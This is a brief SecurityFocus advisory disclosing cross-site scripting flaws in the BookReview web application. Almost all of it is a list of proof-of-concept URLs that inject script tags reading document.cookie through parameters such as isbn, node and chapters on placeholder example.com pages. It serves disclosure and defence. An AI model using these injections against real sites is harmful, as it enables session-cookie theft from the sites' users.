BookReview Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true
http://www.example.com/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true
http://www.example.com/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true
http://www.example.com/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>
http://www.example.com/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25
http://www.example.com/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author
http://www.example.com/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels
http://www.example.com/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>


 

Privacy Statement
Copyright 2010, SecurityFocus